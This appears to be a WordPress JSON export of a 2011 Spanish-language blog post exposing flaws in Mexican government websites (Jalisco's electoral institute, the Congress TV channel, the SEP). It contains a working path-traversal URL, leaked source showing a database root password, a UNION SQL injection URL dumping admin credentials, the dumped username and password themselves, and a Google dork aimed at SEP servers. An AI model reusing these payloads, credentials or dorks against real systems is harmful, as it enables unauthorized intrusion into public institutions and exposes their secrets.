{"id":979,"date":"2011-03-21T21:07:19","date_gmt":"2011-03-22T03:07:19","guid":{"rendered":"http:\/\/puchunguis.com\/blog\/?p=979"},"modified":"2011-03-21T21:23:55","modified_gmt":"2011-03-22T03:23:55","slug":"vulnerabilidades-criticas-en-el-iepc-congreso-de-mexico-y-sep","status":"publish","type":"post","link":"https:\/\/www.jorgealdana.pro\/blog\/seguridad\/vulnerabilidades-criticas-en-el-iepc-congreso-de-mexico-y-sep\/","title":{"rendered":"Vulnerabilidades cr\u00edticas en el IEPC, Congreso de M\u00e9xico y SEP"},"content":{"rendered":"

\"\"<\/a> No es algo nuevo que las entidades gubernamentales se vean de repente frente a una nueva tendencia en la sociedad que los ha puesto \u00abde cabeza\u00bb en varias ocasiones, pero que realmente no les interesa y eso es SEGURIDAD INFORM\u00c1TICA<\/strong>.<\/p>\n

Sabemos que el hecho no es fortuito ni casual. Varios han sido los casos en que muchos gobiernos han experimentado todo tipo de proliferaciones insinuantes o directas de malware, acciones de crackers, defaces apropiaci\u00f3n indebida de contenido web, delitos inform\u00e1ticos, casi siempre en muchas de sus sitios oficiales, algunos recientes por ejemplo dof.gob.mx<\/a>, conaculta.gob.mx<\/a>, economia.gob.mx<\/a> pero eso es historia vieja.<\/p>\n

El gobierno nunca entender\u00e1 que debe de existir un organismo rector, que vigile el cumplimiento de est\u00e1ndares inform\u00e1ticos en las dependencias. <\/p>\n

Instituto Electoral y de Participaci\u00f3n Ciudadana del Estado de Jalisco (IEPC)<\/strong><\/p>\n

El portal del instituto electoral de Jalisco es totalmente vulnerable (http:\/\/www.iepcjalisco.org.mx) ya que ellos en una secci\u00f3n llamada \u00abFolios\u00bb permiten descargar archivos en PDF, pero a los desarrolladores no se les ocurri\u00f3 validar que SOLO archivos de tipo PDF sean lo que realmente se descargue y por tanto el sitio permite descargar cualquier archivo del servidor.<\/p>\n

Exploit: www.iepcjalisco.org.mx\/folios\/downloadPDF.php?f=..\/..\/..\/..\/index.php<\/a><\/p>\n

\n$link=mysql_connect(\u00ablocalhost\u00bb,\u00bbroot\u00bb,\u00bbintranetIEEJ\u00bb);
\n…
\n$sql=\u00bbSELECT * FROM intdocum WHERE user=’$username’ and password=’$password'\u00bb;
\n…\n<\/p><\/blockquote>\n

Canal del Congreso (canaldelcongreso.gob.mx)<\/strong><\/p>\n

Ser\u00e9 simple, claro y conciso \u00abSQL Injection\u00bb:<\/p>\n

http:\/\/www.canaldelcongreso.gob.mx\/nueva_imagen\/seccion.php?id=-1+UNION+SELECT+1,2,concat%28usuario,0x3a,password%29,4,5,6+from+usuarios<\/a><\/p>\n

http:\/\/www.canaldelcongreso.gob.mx\/nueva_imagen\/admin\/login.php<\/a><\/p>\n

Usuario y Contrase\u00f1a:
\ncgpca_5285:658\/\/.3726<\/p>\n

Secretar\u00eda de Educaci\u00f3n P\u00fablica (SEP)<\/strong><\/p>\n

Y el tercero se los dejo de \u00abpil\u00f3n\u00bb para que le busquen XD:<\/p>\n

http:\/\/www.google.com.mx\/cse?cx=partner-pub-8867391459451985%3A2k1x8wpbb0e&cof=FORID%3A10&ie=ISO-8859-1&q=inurl%3A%22sep.gob.mx%22%2B%22index%2Bof%2F%22&sa=Buscar+con+Google&siteurl=www.puchunguis.com%2F&ad=w9&num=10&rurl=http%3A%2F%2Fpuchunguis.com%2Fresultados.php%3Fcx%3Dpartner-pub-8867391459451985%253A2k1x8wpbb0e%26cof%3DFORID%253A10%26ie%3DISO-8859-1%26q%3Dinurl%253A%2522sep.gob.mx%2522%252B%2522index%252Bof%252F%2522%26sa%3DBuscar%2Bcon%2BGoogle%26siteurl%3Dwww.puchunguis.com%252F<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

No es algo nuevo que las entidades gubernamentales se vean de repente frente a una nueva tendencia en la sociedad que los ha puesto \u00abde cabeza\u00bb en varias ocasiones, pero que realmente no les interesa y eso es SEGURIDAD INFORM\u00c1TICA. Sabemos que el hecho no es fortuito ni casual. Varios han sido los casos en que muchos gobiernos han experimentado todo tipo de proliferaciones insinuantes o directas de malware, acciones de crackers, defaces apropiaci\u00f3n indebida de contenido web, delitos inform\u00e1ticos, casi siempre en muchas de sus sitios oficiales, algunos recientes por ejemplo dof.gob.mx, conaculta.gob.mx, economia.gob.mx pero eso es historia vieja. <\/p>\n","protected":false},"author":1,"featured_media":987,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[14],"tags":[1833,1834,7,1831,1832],"class_list":["post-979","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-seguridad","tag-congreso-hackeado","tag-hackean-a-congreso","tag-hackers","tag-iepc-hackeado","tag-sep-hacekado","has_thumb"],"_links":{"self":[{"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/posts\/979","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/comments?post=979"}],"version-history":[{"count":9,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/posts\/979\/revisions"}],"predecessor-version":[{"id":990,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/posts\/979\/revisions\/990"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/media\/987"}],"wp:attachment":[{"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/media?parent=979"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/categories?post=979"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jorgealdana.pro\/blog\/wp-json\/wp\/v2\/tags?post=979"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}